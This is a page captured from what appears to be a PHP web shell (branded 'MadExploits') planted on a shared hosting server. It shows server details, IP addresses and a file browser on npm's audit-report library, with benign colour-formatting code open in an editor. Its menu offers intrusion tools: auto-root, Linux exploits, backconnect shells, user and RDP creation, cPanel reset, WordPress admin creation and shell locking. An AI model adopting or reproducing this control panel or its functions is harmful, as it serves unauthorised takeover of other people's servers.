Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.147.74.197
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
npm-audit-report /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
reporters
[ DIR ]
drwxr-xr-x
colors.js
744
B
-rw-r--r--
exit-code.js
419
B
-rw-r--r--
index.js
918
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : colors.js
const chalk = require('chalk') module.exports = color => { const identity = x => x const green = color ? s => chalk.green.bold(s) : identity const red = color ? s => chalk.red.bold(s) : identity const magenta = color ? s => chalk.magenta.bold(s) : identity const yellow = color ? s => chalk.yellow.bold(s) : identity const white = color ? s => chalk.bold(s) : identity const severity = (sev, s) => sev.toLowerCase() === 'moderate' ? yellow(s || sev) : sev.toLowerCase() === 'high' ? red(s || sev) : sev.toLowerCase() === 'critical' ? magenta(s || sev) : white(s || sev) const dim = color ? s => chalk.dim(s) : identity return { dim, green, red, magenta, yellow, white, severity, } }
Close